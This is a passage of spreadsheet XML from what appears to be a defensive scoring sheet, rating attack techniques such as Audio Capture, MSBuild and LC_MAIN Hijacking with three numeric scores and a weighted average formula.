      <c r="B121" s="41" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:B)</f>
        <v>Peripheral Device Discovery</v>
      </c>
      <c r="C121" s="45" t="s">
        <v>1337</v>
      </c>
      <c r="D121" s="14">
        <v>0</v>
      </c>
      <c r="E121" s="14">
        <v>0</v>
      </c>
      <c r="F121" s="14">
        <v>3</v>
      </c>
      <c r="G121" s="32">
        <f t="shared" si="1"/>
        <v>0.6</v>
      </c>
    </row>
    <row r="122" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A122" s="43" t="s">
        <v>228</v>
      </c>
      <c r="B122" s="41" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:B)</f>
        <v>Peripheral Device Discovery</v>
      </c>
      <c r="C122" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D122" s="14">
        <v>3</v>
      </c>
      <c r="E122" s="14">
        <v>5</v>
      </c>
      <c r="F122" s="14">
        <v>5</v>
      </c>
      <c r="G122" s="32">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="123" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A123" s="43" t="s">
        <v>229</v>
      </c>
      <c r="B123" s="41" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:B)</f>
        <v>Peripheral Device Discovery</v>
      </c>
      <c r="C123" s="45" t="s">
        <v>3064</v>
      </c>
      <c r="D123" s="14">
        <v>2</v>
      </c>
      <c r="E123" s="14">
        <v>4</v>
      </c>
      <c r="F123" s="14">
        <v>5</v>
      </c>
      <c r="G123" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="124" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A124" s="43" t="s">
        <v>231</v>
      </c>
      <c r="B124" s="41" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:B)</f>
        <v>Audio Capture</v>
      </c>
      <c r="C124" s="45" t="s">
        <v>1306</v>
      </c>
      <c r="D124" s="14">
        <v>1</v>
      </c>
      <c r="E124" s="14">
        <v>3</v>
      </c>
      <c r="F124" s="14">
        <v>4</v>
      </c>
      <c r="G124" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="125" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A125" s="43" t="s">
        <v>232</v>
      </c>
      <c r="B125" s="41" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:B)</f>
        <v>System Time Discovery</v>
      </c>
      <c r="C125" s="45" t="s">
        <v>1344</v>
      </c>
      <c r="D125" s="14">
        <v>3</v>
      </c>
      <c r="E125" s="14">
        <v>4</v>
      </c>
      <c r="F125" s="14">
        <v>5</v>
      </c>
      <c r="G125" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="126" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A126" s="43" t="s">
        <v>233</v>
      </c>
      <c r="B126" s="41" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:B)</f>
        <v>Video Capture</v>
      </c>
      <c r="C126" s="45" t="s">
        <v>1349</v>
      </c>
      <c r="D126" s="14">
        <v>1</v>
      </c>
      <c r="E126" s="14">
        <v>2</v>
      </c>
      <c r="F126" s="14">
        <v>3</v>
      </c>
      <c r="G126" s="32">
        <f t="shared" si="1"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="127" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A127" s="43" t="s">
        <v>234</v>
      </c>
      <c r="B127" s="41" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:B)</f>
        <v>Video Capture</v>
      </c>
      <c r="C127" s="45" t="s">
        <v>3065</v>
      </c>
      <c r="D127" s="14">
        <v>3</v>
      </c>
      <c r="E127" s="14">
        <v>4</v>
      </c>
      <c r="F127" s="14">
        <v>5</v>
      </c>
      <c r="G127" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="128" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A128" s="43" t="s">
        <v>236</v>
      </c>
      <c r="B128" s="41" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:B)</f>
        <v>Trusted Developer Utilities Proxy Execution</v>
      </c>
      <c r="C128" s="45" t="s">
        <v>589</v>
      </c>
      <c r="D128" s="14">
        <v>3</v>
      </c>
      <c r="E128" s="14">
        <v>4</v>
      </c>
      <c r="F128" s="14">
        <v>5</v>
      </c>
      <c r="G128" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="129" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A129" s="43" t="s">
        <v>237</v>
      </c>
      <c r="B129" s="41" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:B)</f>
        <v>MSBuild</v>
      </c>
      <c r="C129" s="45" t="s">
        <v>3066</v>
      </c>
      <c r="D129" s="14">
        <v>2</v>
      </c>
      <c r="E129" s="14">
        <v>4</v>
      </c>
      <c r="F129" s="14">
        <v>5</v>
      </c>
      <c r="G129" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="130" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A130" s="43" t="s">
        <v>238</v>
      </c>
      <c r="B130" s="41" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:B)</f>
        <v>Shared Modules</v>
      </c>
      <c r="C130" s="45" t="s">
        <v>1361</v>
      </c>
      <c r="D130" s="14">
        <v>2</v>
      </c>
      <c r="E130" s="14">
        <v>4</v>
      </c>
      <c r="F130" s="14">
        <v>5</v>
      </c>
      <c r="G130" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="131" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A131" s="43" t="s">
        <v>240</v>
      </c>
      <c r="B131" s="41" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:B)</f>
        <v>Shared Modules</v>
      </c>
      <c r="C131" s="45" t="s">
        <v>2173</v>
      </c>
      <c r="D131" s="14">
        <v>3</v>
      </c>
      <c r="E131" s="14">
        <v>5</v>
      </c>
      <c r="F131" s="14">
        <v>5</v>
      </c>
      <c r="G131" s="32">
        <f t="shared" ref="G131:G194" si="2">((D131*2)+(E131*2)+F131)/5</f>
        <v>4.2</v>
      </c>
    </row>
    <row r="132" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A132" s="43" t="s">
        <v>241</v>
      </c>
      <c r="B132" s="41" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:B)</f>
        <v>Shared Modules</v>
      </c>
      <c r="C132" s="45" t="s">
        <v>2019</v>
      </c>
      <c r="D132" s="14">
        <v>2</v>
      </c>
      <c r="E132" s="14">
        <v>4</v>
      </c>
      <c r="F132" s="14">
        <v>5</v>
      </c>
      <c r="G132" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="133" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A133" s="43" t="s">
        <v>242</v>
      </c>
      <c r="B133" s="41" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:B)</f>
        <v>Data Encoding</v>
      </c>
      <c r="C133" s="45" t="s">
        <v>534</v>
      </c>
      <c r="D133" s="14">
        <v>2</v>
      </c>
      <c r="E133" s="14">
        <v>4</v>
      </c>
      <c r="F133" s="14">
        <v>5</v>
      </c>
      <c r="G133" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="134" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A134" s="43" t="s">
        <v>243</v>
      </c>
      <c r="B134" s="41" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:B)</f>
        <v>External Remote Services</v>
      </c>
      <c r="C134" s="45" t="s">
        <v>1139</v>
      </c>
      <c r="D134" s="14">
        <v>3</v>
      </c>
      <c r="E134" s="14">
        <v>4</v>
      </c>
      <c r="F134" s="14">
        <v>5</v>
      </c>
      <c r="G134" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="135" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A135" s="43" t="s">
        <v>244</v>
      </c>
      <c r="B135" s="41" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:B)</f>
        <v>Access Token Manipulation</v>
      </c>
      <c r="C135" s="45" t="s">
        <v>3067</v>
      </c>
      <c r="D135" s="14">
        <v>2</v>
      </c>
      <c r="E135" s="14">
        <v>4</v>
      </c>
      <c r="F135" s="14">
        <v>5</v>
      </c>
      <c r="G135" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="136" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A136" s="43" t="s">
        <v>245</v>
      </c>
      <c r="B136" s="41" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:B)</f>
        <v>Network Share Discovery</v>
      </c>
      <c r="C136" s="45" t="s">
        <v>1407</v>
      </c>
      <c r="D136" s="14">
        <v>3</v>
      </c>
      <c r="E136" s="14">
        <v>4</v>
      </c>
      <c r="F136" s="14">
        <v>5</v>
      </c>
      <c r="G136" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="137" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A137" s="43" t="s">
        <v>246</v>
      </c>
      <c r="B137" s="41" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:B)</f>
        <v>Create Account</v>
      </c>
      <c r="C137" s="45" t="s">
        <v>1410</v>
      </c>
      <c r="D137" s="14">
        <v>4</v>
      </c>
      <c r="E137" s="14">
        <v>4</v>
      </c>
      <c r="F137" s="14">
        <v>5</v>
      </c>
      <c r="G137" s="32">
        <f t="shared" si="2"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="138" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A138" s="43" t="s">
        <v>248</v>
      </c>
      <c r="B138" s="41" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:B)</f>
        <v>Office Application Startup</v>
      </c>
      <c r="C138" s="45" t="s">
        <v>3068</v>
      </c>
      <c r="D138" s="14">
        <v>3</v>
      </c>
      <c r="E138" s="14">
        <v>4</v>
      </c>
      <c r="F138" s="14">
        <v>5</v>
      </c>
      <c r="G138" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="139" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A139" s="43" t="s">
        <v>249</v>
      </c>
      <c r="B139" s="41" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:B)</f>
        <v>Add-ins</v>
      </c>
      <c r="C139" s="45" t="s">
        <v>3069</v>
      </c>
      <c r="D139" s="14">
        <v>2</v>
      </c>
      <c r="E139" s="14">
        <v>4</v>
      </c>
      <c r="F139" s="14">
        <v>5</v>
      </c>
      <c r="G139" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="140" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A140" s="43" t="s">
        <v>250</v>
      </c>
      <c r="B140" s="41" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:B)</f>
        <v>Add-ins</v>
      </c>
      <c r="C140" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D140" s="14">
        <v>3</v>
      </c>
      <c r="E140" s="14">
        <v>4</v>
      </c>
      <c r="F140" s="14">
        <v>5</v>
      </c>
      <c r="G140" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="141" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A141" s="43" t="s">
        <v>251</v>
      </c>
      <c r="B141" s="41" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C141" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D141" s="14">
        <v>2</v>
      </c>
      <c r="E141" s="14">
        <v>3</v>
      </c>
      <c r="F141" s="14">
        <v>4</v>
      </c>
      <c r="G141" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="142" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A142" s="43" t="s">
        <v>253</v>
      </c>
      <c r="B142" s="41" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C142" s="45" t="s">
        <v>3070</v>
      </c>
      <c r="D142" s="14">
        <v>1</v>
      </c>
      <c r="E142" s="14">
        <v>3</v>
      </c>
      <c r="F142" s="14">
        <v>3</v>
      </c>
      <c r="G142" s="32">
        <f t="shared" si="2"/>
        <v>2.2000000000000002</v>
      </c>
    </row>
    <row r="143" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A143" s="43" t="s">
        <v>254</v>
      </c>
      <c r="B143" s="41" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C143" s="45" t="s">
        <v>919</v>
      </c>
      <c r="D143" s="14">
        <v>2</v>
      </c>
      <c r="E143" s="14">
        <v>4</v>
      </c>
      <c r="F143" s="14">
        <v>5</v>
      </c>
      <c r="G143" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="144" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A144" s="43" t="s">
        <v>255</v>
      </c>
      <c r="B144" s="41" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C144" s="45" t="s">
        <v>3071</v>
      </c>
      <c r="D144" s="14">
        <v>2</v>
      </c>
      <c r="E144" s="14">
        <v>4</v>
      </c>
      <c r="F144" s="14">
        <v>4</v>
      </c>
      <c r="G144" s="32">
        <f t="shared" si="2"/>
        <v>3.2</v>
      </c>
    </row>
    <row r="145" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A145" s="43" t="s">
        <v>256</v>
      </c>
      <c r="B145" s="41" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C145" s="45" t="s">
        <v>2085</v>
      </c>
      <c r="D145" s="14">
        <v>0</v>
      </c>
      <c r="E145" s="14">
        <v>1</v>
      </c>
      <c r="F145" s="14">
        <v>2</v>
      </c>
      <c r="G145" s="32">
        <f t="shared" si="2"/>
        <v>0.8</v>
      </c>
    </row>
    <row r="146" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A146" s="43" t="s">
        <v>257</v>
      </c>
      <c r="B146" s="41" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C146" s="45" t="s">
        <v>16</v>
      </c>
      <c r="D146" s="14">
        <v>1</v>
      </c>
      <c r="E146" s="14">
        <v>3</v>
      </c>
      <c r="F146" s="14">
        <v>3</v>
      </c>
      <c r="G146" s="32">
        <f t="shared" si="2"/>
        <v>2.2000000000000002</v>
      </c>
    </row>
    <row r="147" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A147" s="43" t="s">
        <v>258</v>
      </c>
      <c r="B147" s="41" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C147" s="45" t="s">
        <v>2218</v>
      </c>
      <c r="D147" s="14">
        <v>3</v>
      </c>
      <c r="E147" s="14">
        <v>4</v>
      </c>
      <c r="F147" s="14">
        <v>5</v>
      </c>
      <c r="G147" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="148" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A148" s="43" t="s">
        <v>260</v>
      </c>
      <c r="B148" s="41" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C148" s="45" t="s">
        <v>2218</v>
      </c>
      <c r="D148" s="14">
        <v>2</v>
      </c>
      <c r="E148" s="14">
        <v>3</v>
      </c>
      <c r="F148" s="14">
        <v>4</v>
      </c>
      <c r="G148" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="149" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A149" s="43" t="s">
        <v>261</v>
      </c>
      <c r="B149" s="41" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C149" s="45" t="s">
        <v>3072</v>
      </c>
      <c r="D149" s="14">
        <v>2</v>
      </c>
      <c r="E149" s="14">
        <v>3</v>
      </c>
      <c r="F149" s="14">
        <v>5</v>
      </c>
      <c r="G149" s="32">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
    </row>
    <row r="150" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A150" s="43" t="s">
        <v>262</v>
      </c>
      <c r="B150" s="41" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C150" s="45" t="s">
        <v>1462</v>
      </c>
      <c r="D150" s="14">
        <v>2</v>
      </c>
      <c r="E150" s="14">
        <v>3</v>
      </c>
      <c r="F150" s="14">
        <v>4</v>
      </c>
      <c r="G150" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="151" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A151" s="43" t="s">
        <v>263</v>
      </c>
      <c r="B151" s="41" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C151" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D151" s="14">
        <v>3</v>
      </c>
      <c r="E151" s="14">
        <v>4</v>
      </c>
      <c r="F151" s="14">
        <v>5</v>
      </c>
      <c r="G151" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="152" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A152" s="43" t="s">
        <v>264</v>
      </c>
      <c r="B152" s="41" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C152" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D152" s="14">
        <v>2</v>
      </c>
      <c r="E152" s="14">
        <v>4</v>
      </c>
      <c r="F152" s="14">
        <v>5</v>
      </c>
      <c r="G152" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="153" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A153" s="43" t="s">
        <v>265</v>
      </c>
      <c r="B153" s="41" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C153" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D153" s="14">
        <v>3</v>
      </c>
      <c r="E153" s="14">
        <v>4</v>
      </c>
      <c r="F153" s="14">
        <v>5</v>
      </c>
      <c r="G153" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="154" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A154" s="43" t="s">
        <v>266</v>
      </c>
      <c r="B154" s="41" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C154" s="45" t="s">
        <v>1023</v>
      </c>
      <c r="D154" s="14">
        <v>2</v>
      </c>
      <c r="E154" s="14">
        <v>4</v>
      </c>
      <c r="F154" s="14">
        <v>5</v>
      </c>
      <c r="G154" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="155" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A155" s="43" t="s">
        <v>267</v>
      </c>
      <c r="B155" s="41" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C155" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D155" s="14">
        <v>2</v>
      </c>
      <c r="E155" s="14">
        <v>3</v>
      </c>
      <c r="F155" s="14">
        <v>4</v>
      </c>
      <c r="G155" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="156" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A156" s="43" t="s">
        <v>268</v>
      </c>
      <c r="B156" s="41" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C156" s="45" t="s">
        <v>3073</v>
      </c>
      <c r="D156" s="14">
        <v>3</v>
      </c>
      <c r="E156" s="14">
        <v>4</v>
      </c>
      <c r="F156" s="14">
        <v>5</v>
      </c>
      <c r="G156" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="157" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A157" s="43" t="s">
        <v>269</v>
      </c>
      <c r="B157" s="41" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C157" s="45" t="s">
        <v>3074</v>
      </c>
      <c r="D157" s="14">
        <v>3</v>
      </c>
      <c r="E157" s="14">
        <v>4</v>
      </c>
      <c r="F157" s="14">
        <v>5</v>
      </c>
      <c r="G157" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="158" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A158" s="43" t="s">
        <v>270</v>
      </c>
      <c r="B158" s="41" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C158" s="45" t="s">
        <v>16</v>
      </c>
      <c r="D158" s="14">
        <v>1</v>
      </c>
      <c r="E158" s="14">
        <v>3</v>
      </c>
      <c r="F158" s="14">
        <v>4</v>
      </c>
      <c r="G158" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="159" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A159" s="43" t="s">
        <v>271</v>
      </c>
      <c r="B159" s="41" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C159" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D159" s="14">
        <v>2</v>
      </c>
      <c r="E159" s="14">
        <v>4</v>
      </c>
      <c r="F159" s="14">
        <v>5</v>
      </c>
      <c r="G159" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="160" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A160" s="43" t="s">
        <v>272</v>
      </c>
      <c r="B160" s="41" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C160" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D160" s="14">
        <v>2</v>
      </c>
      <c r="E160" s="14">
        <v>3</v>
      </c>
      <c r="F160" s="14">
        <v>4</v>
      </c>
      <c r="G160" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="161" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A161" s="43" t="s">
        <v>273</v>
      </c>
      <c r="B161" s="41" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C161" s="45" t="s">
        <v>791</v>
      </c>
      <c r="D161" s="14">
        <v>2</v>
      </c>
      <c r="E161" s="14">
        <v>3</v>
      </c>
      <c r="F161" s="14">
        <v>4</v>
      </c>
      <c r="G161" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="162" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A162" s="43" t="s">
        <v>274</v>
      </c>
      <c r="B162" s="41" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C162" s="45" t="s">
        <v>3075</v>
      </c>
      <c r="D162" s="14">
        <v>1</v>
      </c>
      <c r="E162" s="14">
        <v>3</v>
      </c>
      <c r="F162" s="14">
        <v>4</v>
      </c>
      <c r="G162" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="163" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A163" s="43" t="s">
        <v>275</v>
      </c>
      <c r="B163" s="41" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C163" s="45" t="s">
        <v>1873</v>
      </c>
      <c r="D163" s="14">
        <v>3</v>
      </c>
      <c r="E163" s="14">
        <v>4</v>
      </c>
      <c r="F163" s="14">
        <v>5</v>
      </c>
      <c r="G163" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="164" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A164" s="43" t="s">
        <v>276</v>
      </c>
      <c r="B164" s="41" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C164" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D164" s="14">
        <v>3</v>
      </c>
      <c r="E164" s="14">
        <v>4</v>
      </c>
      <c r="F164" s="14">
        <v>5</v>
      </c>
      <c r="G164" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="165" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A165" s="43" t="s">
        <v>277</v>
      </c>
      <c r="B165" s="41" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C165" s="45" t="s">
        <v>16</v>
      </c>
      <c r="D165" s="14">
        <v>0</v>
      </c>
      <c r="E165" s="14">
        <v>1</v>
      </c>
      <c r="F165" s="14">
        <v>3</v>
      </c>
      <c r="G165" s="32">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
    </row>
    <row r="166" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A166" s="43" t="s">
        <v>278</v>
      </c>
      <c r="B166" s="41" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C166" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D166" s="14">
        <v>3</v>
      </c>
      <c r="E166" s="14">
        <v>4</v>
      </c>
      <c r="F166" s="14">
        <v>5</v>
      </c>
      <c r="G166" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="167" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A167" s="43" t="s">
        <v>279</v>
      </c>
      <c r="B167" s="41" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C167" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D167" s="14">
        <v>1</v>
      </c>
      <c r="E167" s="14">
        <v>3</v>
      </c>
      <c r="F167" s="14">
        <v>4</v>
      </c>
      <c r="G167" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="168" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A168" s="43" t="s">
        <v>280</v>
      </c>
      <c r="B168" s="41" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C168" s="45" t="s">
        <v>589</v>
      </c>
      <c r="D168" s="14">
        <v>0</v>
      </c>
      <c r="E168" s="14">
        <v>2</v>
      </c>
      <c r="F168" s="14">
        <v>4</v>
      </c>
      <c r="G168" s="32">
        <f t="shared" si="2"/>
        <v>1.6</v>
      </c>
    </row>
    <row r="169" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A169" s="43" t="s">
        <v>281</v>
      </c>
      <c r="B169" s="41" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C169" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D169" s="14">
        <v>3</v>
      </c>
      <c r="E169" s="14">
        <v>4</v>
      </c>
      <c r="F169" s="14">
        <v>5</v>
      </c>
      <c r="G169" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="170" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A170" s="43" t="s">
        <v>282</v>
      </c>
      <c r="B170" s="41" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C170" s="45" t="s">
        <v>16</v>
      </c>
      <c r="D170" s="14">
        <v>3</v>
      </c>
      <c r="E170" s="14">
        <v>4</v>
      </c>
      <c r="F170" s="14">
        <v>5</v>
      </c>
      <c r="G170" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="171" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A171" s="43" t="s">
        <v>283</v>
      </c>
      <c r="B171" s="41" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C171" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D171" s="14">
        <v>3</v>
      </c>
      <c r="E171" s="14">
        <v>4</v>
      </c>
      <c r="F171" s="14">
        <v>5</v>
      </c>
      <c r="G171" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="172" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A172" s="43" t="s">
        <v>284</v>
      </c>
      <c r="B172" s="41" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
